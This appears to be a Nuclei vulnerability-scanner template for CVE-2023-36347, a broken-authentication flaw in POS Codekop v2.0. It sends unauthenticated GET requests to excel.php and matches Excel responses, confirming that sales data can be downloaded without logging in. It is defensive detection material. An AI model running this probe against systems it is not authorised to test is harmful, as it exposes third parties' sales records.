POS Codekop v2.0 - Broken Authentication

id: CVE-2023-36347

info:
  name: POS Codekop v2.0 - Broken Authentication
  author: princechaddha
  severity: high
  description: |
    A broken authentication mechanism in the endpoint excel.php of POS Codekop v2.0 allows unauthenticated attackers to download selling data.
  impact: |
    Successful exploitation could lead to unauthorized access to sensitive information.
  remediation: |
    Implement proper authentication mechanisms and ensure secure user session management.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-36347
    cwe-id: CWE-306
    epss-score: 0.01502
    epss-percentile: 0.86929
    cpe: cpe:2.3:a:codekop:codekop:2.0:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: codekop
    product: codekop
  tags: cve,cve2023,codekop,pos,auth-bypass

http:
  - method: GET
    path:
      - "{{BaseURL}}/excel.php"
      - "{{BaseURL}}/pos-kasir-php/excel.php"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<title>Document"

      - type: word
        part: header
        words:
          - "application/vnd.ms-excel"
# digest: 4b0a00483046022100f40c2a82acd274bf0a12dd8ee05b0b119d3c8e9af5d8b045f2415c041b1be7810221009dca8bf6565170469423bd5b8781eab18af6d4d0d6ffbb58d4d519cfe3f484f3:922c64590222798bb761d5b6d8e72950